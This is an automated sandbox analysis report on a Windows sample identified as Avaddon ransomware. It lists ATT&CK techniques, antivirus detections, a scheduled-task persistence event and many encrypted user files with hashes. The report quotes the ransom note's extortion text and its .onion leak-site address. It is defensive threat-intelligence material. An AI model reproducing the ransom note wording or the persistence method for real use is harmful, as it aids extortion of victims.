                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | System Information Discovery 37 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      [Behavior graph image not reproduced. Behavior Graph ID: 548854; Sample: ab.bin; Startdate: 06/01/2022; Architecture: WINDOWS; Score: 100]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      ab.exe | 88% | Virustotal |
                      ab.exe | 66% | Metadefender |
                      ab.exe | 96% | ReversingLabs | Win32.Ransomware.Avaddon
                      ab.exe | 100% | Avira | HEUR/AGEN.1136765
                      ab.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe | 100% | Avira | HEUR/AGEN.1136765
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe | 88% | Virustotal |
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe | 66% | Metadefender |
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe | 96% | ReversingLabs | Win32.Ransomware.Avaddon

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      35.0.ab.exe.12f0000.0.unpack | 100% | Avira | HEUR/AGEN.1136765
                      0.0.ab.exe.10e0000.0.unpack | 100% | Avira | HEUR/AGEN.1136765
                      2.0.ab.exe.12f0000.0.unpack | 100% | Avira | HEUR/AGEN.1136765
                      2.2.ab.exe.12f0000.0.unpack | 100% | Avira | HEUR/AGEN.1136765
                      35.2.ab.exe.12f0000.0.unpack | 100% | Avira | HEUR/AGEN.1136765

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      https://www.torproject.o | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      Name | Source | Malicious | Antivirus Detection | Reputation
                      https://www.torproject.o | ab.exe, 00000000.00000003.332133858.00000000043E8000.00000004.00000010.sdmp | true | Avira URL Cloud: safe | unknown
                      https://www.torproject.org/ | ab.exe, 00000000.00000003.317616341.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.327252185.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.330084919.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324632117.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321699591.0000000004DB8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, uCLrcwQ_readme_.txt8.0.dr, uCLrcwQ_readme_.txt.0.dr, uCLrcwQ_readme_.txt5.0.dr, uCLrcwQ_readme_.txt10.0.dr, uCLrcwQ_readme_.txt9.0.dr, uCLrcwQ_readme_.txt4.0.dr, uCLrcwQ_readme_.txt2.0.dr, uCLrcwQ_readme_.txt6.0.dr, uCLrcwQ_readme_.txt1.0.dr, uCLrcwQ_readme_.txt7.0.dr, uCLrcwQ_readme_.txt0.0.dr, uCLrcwQ_readme_.txt3.0.dr | false | | high

                        Contacted IPs

                        No contacted IP infos

                        General Information

                        Joe Sandbox Version: 34.0.0 Boulder Opal
                        Analysis ID: 548854
                        Start date: 06.01.2022
                        Start time: 16:46:45
                        Joe Sandbox Product: CloudBasic
                        Overall analysis duration: 0h 7m 33s
                        Hypervisor based Inspection enabled: false
                        Report type: full
                        Sample file name: ab.bin (renamed file extension from bin to exe)
                        Cookbook file name: default.jbs
                        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed: 45
                        Number of new started drivers analysed: 0
                        Number of existing processes analysed: 0
                        Number of existing drivers analysed: 0
                        Number of injected processes analysed: 0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode: default
                        Analysis stop reason: Timeout
                        Detection: MAL
                        Classification: mal100.rans.spre.troj.evad.winEXE@27/228@0/0
                        EGA Information:
                        • Successful, ratio: 50%
                        HDC Information:
                        • Successful, ratio: 36.1% (good quality ratio 34.5%)
                        • Quality average: 67.8%
                        • Quality standard deviation: 26.7%
                        HCA Information: Failed
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        Warnings:
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, VSSVC.exe, svchost.exe, wuapihost.exe
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.35.236.56
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtSetInformationFile calls found.

                        Simulations

                        Behavior and APIs

                        Time | Type | Description
                        16:47:35 | Task Scheduler | Run new task: update path: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        16:47:36 | API Interceptor | 6x Sleep call for process: WMIC.exe modified
                        16:47:46 | API Interceptor | 1x Sleep call for process: ab.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):129
                        Entropy (8bit):5.323600488446077
                        Encrypted:false
                        SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                        MD5:A526B9E7C716B3489D8CC062FBCE4005
                        SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                        SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                        SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                        Malicious:false
                        Preview: [.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                        C:\$RECYCLE.BIN\desktop.ini
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:Windows desktop.ini, ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):129
                        Entropy (8bit):5.323600488446077
                        Encrypted:false
                        SSDEEP:3:0NdQDjoqxyRVIQBU+1IVLfAPmBACaWZcy/FbBmedyn:0NwoSyzI2U8MAPVCawbBmeUn
                        MD5:A526B9E7C716B3489D8CC062FBCE4005
                        SHA1:2DF502A944FF721241BE20A9E449D2ACD07E0312
                        SHA-256:E1B9CE9B57957B1A0607A72A057D6B7A9B34EA60F3F8AA8F38A3AF979BD23066
                        SHA-512:D83D4C656C96C3D1809AD06CE78FA09A77781461C99109E4B81D1A186FC533A7E72D65A4CB7EDF689EECCDA8F687A13D3276F1111A1E72F7C3CD92A49BCE0F88
                        Malicious:false
                        Preview: [.ShellClassInfo]..CLSID={645FF040-5081-101B-9F08-00AA002F954E}..LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-8964..
                        C:\Users\Public\Libraries\RecordedTV.library-ms
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97920677738626
                        Encrypted:false
                        SSDEEP:192:AmnF2WNC7nuVmW/CKw3GwU+GpV0nD2t6SOtpVD4sNK763dV+P:321W/nwWwU+GpeD20rissGO
                        MD5:E22DCB2757FF27EEF3268FB5726335A2
                        SHA1:CAC1831D5DDC0D5FCB743AC5570FB501DCB1A49A
                        SHA-256:299386AACAF3CDA22C4DF4647593E644DBB668BCC2DA4B4D3B41BB98E43AF428
                        SHA-512:1D99E98BF756EF952695C5552ABDB06B74720825DAFF8ECBF0D72311B4303F6E8013C8515BB3EDAB698D0D6271AE2A5D06B6CE0FF0DECC5FD438366B374ECAB8
                        Malicious:false
                        C:\Users\Public\Libraries\RecordedTV.library-ms.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97920677738626
                        Encrypted:false
                        SSDEEP:192:AmnF2WNC7nuVmW/CKw3GwU+GpV0nD2t6SOtpVD4sNK763dV+P:321W/nwWwU+GpeD20rissGO
                        MD5:E22DCB2757FF27EEF3268FB5726335A2
                        SHA1:CAC1831D5DDC0D5FCB743AC5570FB501DCB1A49A
                        SHA-256:299386AACAF3CDA22C4DF4647593E644DBB668BCC2DA4B4D3B41BB98E43AF428
                        SHA-512:1D99E98BF756EF952695C5552ABDB06B74720825DAFF8ECBF0D72311B4303F6E8013C8515BB3EDAB698D0D6271AE2A5D06B6CE0FF0DECC5FD438366B374ECAB8
                        Malicious:false
                        C:\Users\Public\Libraries\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:modified
                        Size (bytes):3777
                        Entropy (8bit):5.732654072634773
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69J:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USd
                        MD5:7C4A65CA4999BD0122440C05C4D40942
                        SHA1:8494FA2322AF44C66F598179B42D08105374AD6F
                        SHA-256:86DFF7E4B80C8A48CC63CB4A0DFC3B92C64355E9B441B3D3C05EE319A25FBFF0
                        SHA-512:A61FA1744DB62E97A448ADF564A162D61CD10DE6BC03734369BDA58D32AAB67B81F18667B5E5842DF57672E009385AE03ED5868354732F61CDD0B3B27C606968
                        Malicious:true
                        Yara Hits:
                        • Rule: JoeSecurity_Avaddon, Description: Yara detected Avaddon Ransomware, Source: C:\Users\Public\Libraries\uCLrcwQ_readme_.txt, Author: Joe Security
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):794112
                        Entropy (8bit):6.16411908069709
                        Encrypted:false
                        SSDEEP:24576:TCs99+OXLpMePfI8TgmBTCDqEbOpPtpFhyxfq:5GOXLpMePfzVTCD7gPtLhSfq
                        MD5:0B486FE0503524CFE4726A4022FA6A68
                        SHA1:297DEA71D489768CE45D23B0F8A45424B469AB00
                        SHA-256:1228D0F04F0BA82569FC1C0609F9FD6C377A91B9EA44C1E7F9F84B2B90552DA2
                        SHA-512:F4273CA5CC3A9360AF67F4B4EE0BF067CF218C5DC8CAEAFBFA1B809715EFFE742F2E1F54E4FE9EC8D4B8E3AE697D57F91C2B49BDF203648508D75D4A76F53619
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: Virustotal, Detection: 88%, Browse
                        • Antivirus: Metadefender, Detection: 66%, Browse
                        • Antivirus: ReversingLabs, Detection: 96%
                        C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe:Zone.Identifier
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:true
                        Preview: [ZoneTransfer]....ZoneId=0
                        C:\Users\user\Desktop\BNAGMGSPLO.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978845042070389
                        Encrypted:false
                        SSDEEP:192:Cw8bRbuj/mAcfzOaMdsonbziYvSHsj/4a57yV+n:CZlVAcfzOxNnbT6etr
                        MD5:C1DD5D9DDD42B96F8CB33309E8E5E313
                        SHA1:DA232AE8830066BFE4689BFC22641E5E966DCA38
                        SHA-256:35E5F4EE17A317C29EA205854051061007F8CB7B1C1480F8F45F11AA8FB3CC4D
                        SHA-512:61DD30A3F328A8D8DFFCF0908F9E91AF224CD1FD485C69D5809EFD4D00DDCEC2933B32C4FEB946BDFE5E0F0CD82A7FBA9E6DBFEDEFA9C0B1D43C27342118279B
                        Malicious:true
                        C:\Users\user\Desktop\BNAGMGSPLO.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978845042070389
                        Encrypted:false
                        SSDEEP:192:Cw8bRbuj/mAcfzOaMdsonbziYvSHsj/4a57yV+n:CZlVAcfzOxNnbT6etr
                        MD5:C1DD5D9DDD42B96F8CB33309E8E5E313
                        SHA1:DA232AE8830066BFE4689BFC22641E5E966DCA38
                        SHA-256:35E5F4EE17A317C29EA205854051061007F8CB7B1C1480F8F45F11AA8FB3CC4D
                        SHA-512:61DD30A3F328A8D8DFFCF0908F9E91AF224CD1FD485C69D5809EFD4D00DDCEC2933B32C4FEB946BDFE5E0F0CD82A7FBA9E6DBFEDEFA9C0B1D43C27342118279B
                        Malicious:false
                        C:\Users\user\Desktop\EEGWXUHVUG.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978111793832275
                        Encrypted:false
                        SSDEEP:192:OkGcTe/5yk671S6mqkBeSv4SXq407EzQyXvkwrGV+n:51Bk6RS6nQXxHEEz5
                        MD5:E4C6DDAC88526D3CC6861A9E4279477B
                        SHA1:4C9F8F0987306CB664E26B9FAACDA969451C0CFE
                        SHA-256:B572F5CDFCFC14CDFCD5938B1E63E599CC0C7C2DAAF22A48AC7BA03969802B2C
                        SHA-512:EC68AB52A5A3BB66CB59895ACFD7ACB2B8B084F4C410DD4D48E9306F6162CADA7F8857F1567FC84AB899ECA10F2F4B9C1D1651DA3B3F6ABE09BFD67C3D8EACFA
                        Malicious:false
                        C:\Users\user\Desktop\EEGWXUHVUG.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978111793832275
                        Encrypted:false
                        SSDEEP:192:OkGcTe/5yk671S6mqkBeSv4SXq407EzQyXvkwrGV+n:51Bk6RS6nQXxHEEz5
                        MD5:E4C6DDAC88526D3CC6861A9E4279477B
                        SHA1:4C9F8F0987306CB664E26B9FAACDA969451C0CFE
                        SHA-256:B572F5CDFCFC14CDFCD5938B1E63E599CC0C7C2DAAF22A48AC7BA03969802B2C
                        SHA-512:EC68AB52A5A3BB66CB59895ACFD7ACB2B8B084F4C410DD4D48E9306F6162CADA7F8857F1567FC84AB899ECA10F2F4B9C1D1651DA3B3F6ABE09BFD67C3D8EACFA
                        Malicious:false
                        C:\Users\user\Desktop\EFOYFBOLXA.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9783433145335865
                        Encrypted:false
                        SSDEEP:192:jCtyPOg9Ta7xm/sJ1duqSNYHTF1DCn03s3nc6JV+n:Ot+qxm/q1dO+zqn8Oc6W
                        MD5:264BDCF39559FE6FDB92CFF7582810F1
                        SHA1:E21157DCF3F6233446D5A7AC465C52B64704DAB0
                        SHA-256:7A6F1A1E0FA03F69A2CA49411ABFFD270C1EED058355F08F1A0AF3B09313C275
                        SHA-512:A87784AF608B94445AB2C7D1B4EED2E16F9AF25FAEE50561A3A2A4F059565CFE0FD79538C590CD67212874055458E2DA9858BA8C1D5A5430A82C264ACEC596E9
                        Malicious:false
                        C:\Users\user\Desktop\EFOYFBOLXA.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9783433145335865
                        Encrypted:false
                        SSDEEP:192:jCtyPOg9Ta7xm/sJ1duqSNYHTF1DCn03s3nc6JV+n:Ot+qxm/q1dO+zqn8Oc6W
                        MD5:264BDCF39559FE6FDB92CFF7582810F1
                        SHA1:E21157DCF3F6233446D5A7AC465C52B64704DAB0
                        SHA-256:7A6F1A1E0FA03F69A2CA49411ABFFD270C1EED058355F08F1A0AF3B09313C275
                        SHA-512:A87784AF608B94445AB2C7D1B4EED2E16F9AF25FAEE50561A3A2A4F059565CFE0FD79538C590CD67212874055458E2DA9858BA8C1D5A5430A82C264ACEC596E9
                        Malicious:false
                        C:\Users\user\Desktop\EFOYFBOLXA.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9745453799453605
                        Encrypted:false
                        SSDEEP:192:rAbd0iWYRBCS4u2uVMMLx9PBUaLx64Cqv3Chz/kYVV+n:wdfHf94upqMl9PBUQxh3v3uz/a
                        MD5:EC542B434FA48D85DC67F32EB751A4E3
                        SHA1:B2620AB705E48FE29352AD8EDE11933C7F9D6B5F
                        SHA-256:C3D00E5448E4C971F8CA65F0514C3A579E32D9AB51CBC00217540B6F6BBC6A96
                        SHA-512:13D585F8E8C3BFB3780A4127E94C61E1530E357A97111CFE237DC6057A485CCADB46378275F437D60A2F6655B5A1E8C3B4F2C9FFE027B859D0C2CDB0877F2A78
                        Malicious:false
                        C:\Users\user\Desktop\EFOYFBOLXA.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9745453799453605
                        Encrypted:false
                        SSDEEP:192:rAbd0iWYRBCS4u2uVMMLx9PBUaLx64Cqv3Chz/kYVV+n:wdfHf94upqMl9PBUQxh3v3uz/a
                        MD5:EC542B434FA48D85DC67F32EB751A4E3
                        SHA1:B2620AB705E48FE29352AD8EDE11933C7F9D6B5F
                        SHA-256:C3D00E5448E4C971F8CA65F0514C3A579E32D9AB51CBC00217540B6F6BBC6A96
                        SHA-512:13D585F8E8C3BFB3780A4127E94C61E1530E357A97111CFE237DC6057A485CCADB46378275F437D60A2F6655B5A1E8C3B4F2C9FFE027B859D0C2CDB0877F2A78
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.981497081320176
                        Encrypted:false
                        SSDEEP:192:qzGrGSjQTt3CLCPLXJQpLOW/uUjQr6Ku3q2KUaf++X7bIIcV+n:qPpT9E45uLf/K2KeeUKfX786
                        MD5:3396CC70C716549D807D7369852BCF3F
                        SHA1:31D6C6115E391A1874829A2BC8845BB82B129853
                        SHA-256:C38479E47FB444B527F74246ECC70EEA27E82F27D5916296115A49706856BD31
                        SHA-512:F687B53F93B7105A1472A8CDE059BDA8EF1DE91B0C8DE83095BE834A1597BF404C27D9606CC99705AFA7F3746C533C7F5536808275838FDB8CC6A91566A277CE
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.981497081320176
                        Encrypted:false
                        SSDEEP:192:qzGrGSjQTt3CLCPLXJQpLOW/uUjQr6Ku3q2KUaf++X7bIIcV+n:qPpT9E45uLf/K2KeeUKfX786
                        MD5:3396CC70C716549D807D7369852BCF3F
                        SHA1:31D6C6115E391A1874829A2BC8845BB82B129853
                        SHA-256:C38479E47FB444B527F74246ECC70EEA27E82F27D5916296115A49706856BD31
                        SHA-512:F687B53F93B7105A1472A8CDE059BDA8EF1DE91B0C8DE83095BE834A1597BF404C27D9606CC99705AFA7F3746C533C7F5536808275838FDB8CC6A91566A277CE
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978097642317819
                        Encrypted:false
                        SSDEEP:192:4nSV5PDnJomSb4dP/MZJhVZjMukI18+gyPNPzF8cvZ/ifAoFmV+n:4SVFnJJSUsVZJV1zPRzF5gYGD
                        MD5:34225C254118F5947327C09C4B3233EC
                        SHA1:BEA8D5DF41168A656ABCF9C573818F275AF0E2B8
                        SHA-256:9C6846896C72C0826339AE7D84945D058B5EB1C905BE17DB9DCDD4148B36DCA9
                        SHA-512:1C8C97D70A10B3101D5681F1775A5A77BF38E0B4E98B93EEA0FD88ED8E476FD97B7F0CC07E133D8ECC89C0735864FF0955ADE98F354D4C5EA042FFE87222A828
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978097642317819
                        Encrypted:false
                        SSDEEP:192:4nSV5PDnJomSb4dP/MZJhVZjMukI18+gyPNPzF8cvZ/ifAoFmV+n:4SVFnJJSUsVZJV1zPRzF5gYGD
                        MD5:34225C254118F5947327C09C4B3233EC
                        SHA1:BEA8D5DF41168A656ABCF9C573818F275AF0E2B8
                        SHA-256:9C6846896C72C0826339AE7D84945D058B5EB1C905BE17DB9DCDD4148B36DCA9
                        SHA-512:1C8C97D70A10B3101D5681F1775A5A77BF38E0B4E98B93EEA0FD88ED8E476FD97B7F0CC07E133D8ECC89C0735864FF0955ADE98F354D4C5EA042FFE87222A828
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97864135938087
                        Encrypted:false
                        SSDEEP:192:20TaDQLe6Qt5HDpL4xa6UBGXqM3w9Rza1MvChxIDyV+n:202DAeltHLBusG7+H
                        MD5:6C40E0A15375AE854B6CCA84EA7916D2
                        SHA1:D35BE7C8D002D4606E43EDA9949CB96A1E117C30
                        SHA-256:143634615334FA1F670AA65AE0C494668FC5DFD52A36A46EFFB2D7EDAA187107
                        SHA-512:E9BC02BC6C0FB766F514B26EADEF41045A9436214CA852F6207AD8633FB52B86DB19E8EC25A920940B996AEA774F47A3A9FD5E80201C35671B6D16A5CBEE7B9F
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.97864135938087
                        Encrypted:false
                        SSDEEP:192:20TaDQLe6Qt5HDpL4xa6UBGXqM3w9Rza1MvChxIDyV+n:202DAeltHLBusG7+H
                        MD5:6C40E0A15375AE854B6CCA84EA7916D2
                        SHA1:D35BE7C8D002D4606E43EDA9949CB96A1E117C30
                        SHA-256:143634615334FA1F670AA65AE0C494668FC5DFD52A36A46EFFB2D7EDAA187107
                        SHA-512:E9BC02BC6C0FB766F514B26EADEF41045A9436214CA852F6207AD8633FB52B86DB19E8EC25A920940B996AEA774F47A3A9FD5E80201C35671B6D16A5CBEE7B9F
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978335496028412
                        Encrypted:false
                        SSDEEP:192:3dLy48vX6c8TqxVyZMjWQXrEeZUEG2wpM/g6ywfYFe53K0V+n:NL38vX6hT4/j7Xrz+Swpg1Doqm
                        MD5:C9A28F36D717389FAE7C4426D78950F8
                        SHA1:F19CE42DEEC132179CC560A0CFEB1785C8ECF70B
                        SHA-256:1BC2F202F3883155505766DEBDB2B83A37EBE1D6FF3BDB03551D2ED960D187C6
                        SHA-512:3F76B4FDDE8B7D8BCAB42572F3AC4EB49508EF70B1F7F4552B0E807E5B198C3AC4AAD12CCD29288C4735E30B94823C90EF8C602B6E64A2B63474967CAA80B6FC
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978335496028412
                        Encrypted:false
                        SSDEEP:192:3dLy48vX6c8TqxVyZMjWQXrEeZUEG2wpM/g6ywfYFe53K0V+n:NL38vX6hT4/j7Xrz+Swpg1Doqm
                        MD5:C9A28F36D717389FAE7C4426D78950F8
                        SHA1:F19CE42DEEC132179CC560A0CFEB1785C8ECF70B
                        SHA-256:1BC2F202F3883155505766DEBDB2B83A37EBE1D6FF3BDB03551D2ED960D187C6
                        SHA-512:3F76B4FDDE8B7D8BCAB42572F3AC4EB49508EF70B1F7F4552B0E807E5B198C3AC4AAD12CCD29288C4735E30B94823C90EF8C602B6E64A2B63474967CAA80B6FC
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980830467973997
                        Encrypted:false
                        SSDEEP:192:eppMigRHIxjjA86PivzJQPz7hqIRe0xZh6McVuV+n:0pM95IW3Pezs7kMnC7
                        MD5:F8BA46F9A80CF8A8F35E7218FA651F42
                        SHA1:87CE8DC9DADBD630DF7EB78F4E71B5C027915988
                        SHA-256:BF079E760365D2975E6DE609DA142983135F55E7103368901804529B01CFF673
                        SHA-512:9625A71461B55854D3D30844AB3405151FF58D5DB56F176E05E0DBC8DC001C6B63F71B2BDE39FE4DA1FE71F89B1AADF116321AB7F9214C14BEE6394E9AEAA87D
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980830467973997
                        Encrypted:false
